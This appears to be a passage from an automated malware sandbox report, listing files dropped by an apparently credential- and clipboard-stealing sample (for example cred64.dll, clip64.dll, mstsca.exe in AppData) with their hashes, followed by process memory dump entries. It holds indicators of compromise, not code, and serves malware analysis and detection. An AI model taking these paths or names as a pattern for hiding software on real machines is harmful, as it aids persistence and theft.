8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Roaming\btcvrwh

Filesize
259KB

MD5
dab7f5c16d3e413a803bf720f9d51cbb

SHA1
dd1a42dc9d8da48627914baf08deab51f5c44687

SHA256
d3c2e2eb1751e0017a6bcbdb81494f52c80a675d3d4d3d7dfce16be57d776b80

SHA512
02e27f601a531d6543b6f16be776bbf08714218ed599ae9fd5e04d87acf176da74fc8cf075d796fc36f240ce677c43b68a3a6e0d3ac1fb788c98c825885c8d7c

Download Submit
C:\Users\Admin\AppData\Roaming\chcvrwh

Filesize
258KB

MD5
9d0c07457f0b8a8cd97cbda81e927af0

SHA1
d9b56002ceb00cbec2adf9dd484081cffcc0994f

SHA256
3276602b7f569ee7adb8be762d5b5ed6a516484db32318344e11f2dc9f068267

SHA512
c6d1b00ffc1b835a85d016217cb0c9cb8c68d2b24ab214208667299b920a1f8ef205c7c796a8dea074ef6013b786768c150082f5c806e8a75152f2396eb91731

Download Submit
\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll

Filesize
89KB

MD5
d3074d3a19629c3c6a533c86733e044e

SHA1
5b15823311f97036dbaf4a3418c6f50ffade0eb9

SHA256
b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401

SHA512
7dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf

Download Submit
\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

Filesize
1.0MB

MD5
2c4e958144bd089aa93a564721ed28bb

SHA1
38ef85f66b7fdc293661e91ba69f31598c5b5919

SHA256
b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855

SHA512
a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6

Download Submit
\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll

Filesize
1.0MB

MD5
2c4e958144bd089aa93a564721ed28bb

SHA1
38ef85f66b7fdc293661e91ba69f31598c5b5919

SHA256
b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855

SHA512
a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6

Download Submit
memory/512-300-0x00007FF64C880000-0x00007FF64CC3D000-memory.dmp

Filesize
3.7MB

Download
memory/656-251-0x0000000000280000-0x0000000000710000-memory.dmp

Filesize
4.6MB

Download
memory/1808-122-0x00000000022E0000-0x00000000022E9000-memory.dmp

Filesize
36KB

Download
memory/1808-124-0x0000000000400000-0x0000000000703000-memory.dmp

Filesize
3.0MB

Download
memory/1832-1155-0x00000210F0F80000-0x00000210F0F90000-memory.dmp

Filesize
64KB

Download
memory/1832-1156-0x00000210F0F80000-0x00000210F0F90000-memory.dmp

Filesize
64KB

Download
memory/1832-1145-0x00000210F2FE0000-0x00000210F3056000-memory.dmp

Filesize
472KB

Download
memory/1832-1140-0x00000210F2E30000-0x00000210F2E52000-memory.dmp

Filesize
136KB

Download
memory/2192-1179-0x0000000003200000-0x000000000320B000-memory.dmp

Filesize
44KB

Download
memory/2192-1177-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/2288-1173-0x0000000007FD0000-0x0000000007FF2000-memory.dmp

Filesize
136KB

Download
memory/2288-1175-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/2288-1174-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/2288-1213-0x000000000B1A0000-0x000000000B818000-memory.dmp

Filesize
6.5MB

Download
memory/2288-1171-0x0000000007930000-0x0000000007F58000-memory.dmp

Filesize
6.2MB

Download
memory/2288-1178-0x0000000008250000-0x00000000082B6000-memory.dmp

Filesize
408KB

Download
memory/2288-1218-0x0000000009890000-0x000000000989A000-memory.dmp

Filesize
40KB

Download
memory/2288-1169-0x00000000072C0000-0x00000000072F6000-memory.dmp

Filesize
216KB

Download
memory/2288-1216-0x000000000AB20000-0x000000000AB3A000-memory.dmp

Filesize
104KB

Download
memory/2288-1183-0x00000000082C0000-0x00000000082DC000-memory.dmp

Filesize
112KB

Download
memory/2288-1180-0x00000000083C0000-0x0000000008710000-memory.dmp

Filesize
3.3MB

Download
memory/2288-1206-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/2632-228-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-241-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-200-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-201-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-206-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-207-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-208-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-230-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-231-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2632-238-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3164-140-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-148-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-149-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-150-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-155-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-156-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-157-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-158-0x00000000014E0000-0x00000000014ED000-memory.dmp

Filesize
52KB

Download
memory/3164-159-0x0000000001530000-0x0000000001534000-memory.dmp

Filesize
16KB

Download
memory/3164-151-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-123-0x0000000000FD0000-0x0000000000FE6000-memory.dmp

Filesize
88KB

Download
memory/3164-137-0x00000000022E0000-0x00000000022E9000-memory.dmp

Filesize
36KB

Download
memory/3164-243-0x0000000003440000-0x0000000003456000-memory.dmp

Filesize
88KB

Download
memory/3164-138-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-132-0x0000000000FA0000-0x0000000000FB0000-memory.dmp

Filesize
64KB

Download
memory/3164-141-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-147-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-146-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-210-0x00000000033A0000-0x00000000033B6000-memory.dmp

Filesize
88KB

Download
memory/3164-209-0x0000000001530000-0x0000000001534000-memory.dmp

Filesize
16KB

Download
memory/3164-143-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-142-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-197-0x00000000022E0000-0x00000000022E9000-memory.dmp

Filesize
36KB

Download
memory/3164-154-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3164-134-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3344-302-0x0000000002E90000-0x0000000002FC4000-memory.dmp

Filesize
1.2MB

Download
memory/3344-294-0x0000000002E90000-0x0000000002FC4000-memory.dmp

Filesize
1.2MB

Download
memory/3344-293-0x0000000002D10000-0x0000000002E83000-memory.dmp

Filesize
1.4MB

Download
memory/3612-1215-0x0000000002EE0000-0x0000000002F07000-memory.dmp

Filesize
156KB

Download
memory/3612-1217-0x00000000032B0000-0x00000000032B9000-memory.dmp

Filesize
36KB

Download
memory/3908-1199-0x0000000000AE0000-0x0000000000AEF000-memory.dmp

Filesize
60KB

Download
memory/3908-1200-0x00000000008E0000-0x00000000008E9000-memory.dmp

Filesize
36KB

Download
memory/3972-328-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3972-326-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3972-312-0x0000000002720000-0x000000000277A000-memory.dmp

Filesize
360KB

Download
memory/3972-1176-0x0000000007340000-0x000000000786C000-memory.dmp

Filesize
5.2MB

Download
memory/3972-313-0x0000000004FC0000-0x00000000054BE000-memory.dmp

Filesize
5.0MB

Download
memory/3972-314-0x00000000027D0000-0x0000000002826000-memory.dmp

Filesize
344KB

Download
memory/3972-1172-0x0000000007160000-0x0000000007322000-memory.dmp

Filesize
1.8MB

Download
memory/3972-315-0x0000000000840000-0x00000000008A2000-memory.dmp

Filesize
392KB

Download
memory/3972-316-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/3972-1131-0x0000000006FD0000-0x0000000007020000-memory.dmp

Filesize
320KB

Download
memory/3972-1214-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/3972-1129-0x0000000006CB0000-0x0000000006CCE000-memory.dmp

Filesize
120KB

Download
memory/3972-1127-0x0000000006C10000-0x0000000006C86000-memory.dmp

Filesize
472KB

Download
memory/3972-1126-0x0000000006B60000-0x0000000006BF2000-memory.dmp

Filesize
584KB

Download
memory/3972-1125-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/3972-1123-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/3972-1122-0x0000000004E90000-0x0000000004EDB000-memory.dmp

Filesize
300KB

Download
memory/3972-1121-0x0000000004E00000-0x0000000004E3E000-memory.dmp

Filesize
248KB

Download
memory/3972-1120-0x0000000005AD0000-0x0000000005BDA000-memory.dmp

Filesize
1.0MB

Download
memory/3972-1119-0x0000000002880000-0x0000000002892000-memory.dmp

Filesize
72KB

Download
memory/3972-1118-0x00000000054C0000-0x0000000005AC6000-memory.dmp

Filesize
6.0MB

Download
memory/3972-330-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3972-317-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/3972-318-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/3972-324-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3972-322-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3972-320-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3972-319-0x00000000027D0000-0x0000000002822000-memory.dmp

Filesize
328KB

Download
memory/3984-1186-0x0000000000AE0000-0x0000000000AEF000-memory.dmp

Filesize
60KB

Download
memory/3984-1185-0x0000000003200000-0x000000000320B000-memory.dmp

Filesize
44KB

Download
memory/4372-212-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/4372-180-0x0000000000760000-0x0000000000769000-memory.dmp

Filesize
36KB

Download
memory/4488-1202-0x0000000000DC0000-0x0000000000DCC000-memory.dmp

Filesize
48KB

Download
memory/4488-1201-0x00000000008E0000-0x00000000008E9000-memory.dmp

Filesize
36KB

Download
memory/4536-173-0x0000000004950000-0x0000000004A6B000-memory.dmp

Filesize
1.1MB

Download
memory/4712-1208-0x0000000002EE0000-0x0000000002F07000-memory.dmp

Filesize
156KB

Download
memory/4712-1207-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/4764-170-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4764-193-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4764-191-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4764-172-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4764-179-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/4780-291-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/4836-242-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/5060-223-0x00000000022E0000-0x00000000022E9000-memory.dmp

Filesize
36KB

Download
memory/5060-244-0x0000000000400000-0x0000000000703000-memory.dmp

Filesize
3.0MB

Download